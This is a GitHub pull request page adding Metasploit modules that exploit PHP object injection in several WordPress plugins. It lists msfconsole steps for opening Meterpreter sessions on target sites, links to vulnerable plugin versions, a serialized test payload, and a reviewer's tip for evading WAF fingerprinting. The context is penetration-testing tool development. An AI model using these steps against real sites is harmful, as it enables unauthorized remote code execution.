New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add exploit modules for multiple PHP object injection vulnerabilities in various WordPress plugins #8006

Open
wants to merge 28 commits into
base: master
from

Conversation

Projects
None yet
5 participants
@ykoster
Contributor

ykoster commented Feb 24, 2017

These modules exploit multiple unauthenticated PHP object injection vulnerabilities in various WordPress plugins. Targets WordPress 3.4 - 4.x (tested on WordPress 4.5.3 - 4.7.2).

Affected plugins

Google Forms < 0.91
Ecwid Ecommerce Shopping Cart < 4.4.4
CMS Commander Client < 2.22
InfiniteWP Client < 1.6.1.1
Analytics Stats Counter Statistics (not fixed)
YITH WooCommerce Compare < 2.1.0
Google Analytics Counter Tracker < 3.5.1

Verification

Make sure you're running a WordPress site with one of the affected plugins installed & actived.

Google Forms < 0.91

https://sumofpwn.nl/download/wpgform.0.84.zip

  • Start msfconsole
  • use exploit/multi/http/wp_google_forms_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

Ecwid Ecommerce Shopping Cart < 4.4.4

Requires (free) registation & activation @ Ecwid

https://sumofpwn.nl/download/ecwid-shopping-cart.4.4.zip

  • Start msfconsole
  • use exploit/multi/http/wp_ecwid_shopping_cart_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

CMS Commander Client < 2.22

https://sumofpwn.nl/download/cms-commander-client.2.21.zip

  • Start msfconsole
  • use exploit/multi/http/wp_cms_commander_client_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

InfiniteWP Client < 1.6.1.1

https://sumofpwn.nl/download/iwp-client.zip

  • Start msfconsole
  • use exploit/multi/http/wp_infinitewp_client_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

Analytics Stats Counter Statistics

https://sumofpwn.nl/download/stats-counter.zip

  • Start msfconsole
  • use exploit/multi/http/wp_analytics_stats_counter_statistics_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

YITH WooCommerce Compare < 2.1.0

Requires WooCommerce

https://sumofpwn.nl/download/yith-woocommerce-compare.2.0.9.zip
https://sumofpwn.nl/download/woocommerce.2.6.1.zip

  • Start msfconsole
  • use exploit/multi/http/wp_yith_woocommerce_compare_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

Google Analytics Counter Tracker < 3.5.1

https://sumofpwn.nl/download/analytics-counter.zip

  • Start msfconsole
  • use exploit/multi/http/wp_google_analytics_counter_tracker_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

Yorick Koster and others added some commits Nov 8, 2016

Add files via upload
This module exploits multiple PHP object injection vulnerabilities affecting various WordPress plugins. Targets WordPress 3.4 - 4.x (tested on WordPress 4.5.3 - 4.7.2)
Update wp_plugins_unserialize.rb
Fix formatting warnings
Update wp_plugins_unserialize.rb
Removed nBill Lite reference, fixed indices
@wchen-r7

This comment has been minimized.

Contributor

wchen-r7 commented Feb 24, 2017

I think this module needs to be broken down into separate modules.

@ykoster

This comment has been minimized.

Contributor

ykoster commented Feb 24, 2017

@wchen-r7 split in separate modules :)

ykoster added some commits Feb 25, 2017

@ykoster ykoster changed the title from Add exploit module for multiple PHP object injection vulnerabilities affecting various WordPress plugins to Add exploit modules for multiple PHP object injection vulnerabilities in various WordPress plugins Feb 25, 2017

ykoster added some commits Feb 25, 2017

@ykoster

This comment has been minimized.

Contributor

ykoster commented Apr 21, 2017

FYI, the POP chain still works in WordPress 4.7.4, which was released yesterday

'method' => 'POST',
'uri' => target_uri.path,
'vars_post' => {
'wpadm_stat_request' => '=YToxOntpOjA7czo0OiJ0ZXN0Ijt9'

This comment has been minimized.

@jvoisin

jvoisin May 2, 2017

Contributor

Please encode at runtime, with something like Base64.encode64('a:1:{i:0;s:4:"test";}')

This comment has been minimized.

@jvoisin

jvoisin May 2, 2017

Contributor

It could also be interesting to not hardcode the test string, but to use a random one, to bypass idiotic WAF that will fingerprint YToxOntpOjA7czo0OiJ0ZXN0Ijt9.

@jrobles-r7 jrobles-r7 self-assigned this Nov 16, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment